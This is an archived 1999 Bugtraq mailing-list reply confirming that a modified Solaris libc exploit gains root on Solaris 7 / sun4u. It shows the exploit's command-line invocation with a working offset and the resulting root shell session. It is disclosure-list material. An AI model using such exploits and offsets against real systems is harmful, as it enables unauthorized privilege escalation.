[10614] in bugtraq
Re: Solaris libc exploit
daemon@ATHENA.MIT.EDU (Cliff)
Mon May 24 01:12:11 1999
Message-Id: <3748C2D0.57FE29B7@u.washington.edu>
Date: Sun, 23 May 1999 20:09:05 -0700
Reply-To: Cliff <cliffo@U.WASHINGTON.EDU>
From: Cliff <cliffo@U.WASHINGTON.EDU>
To: BUGTRAQ@NETSPACE.ORG

Works nicely on Solaris 7 / sun4u using acpizer's modified source and the
offsets listed...

nowhere:~/temp/crack$ ./a.out 7160
jumping address : ffbedf10, offset = 7160
# uname -a
SunOS nowhere 5.7 Generic sun4u sparc sun4u
# ls -al /
.
.
.
drwx------ 17 root root 1536 May 23 00:18 root
.
.
.
# cd /root
# pwd
/root
#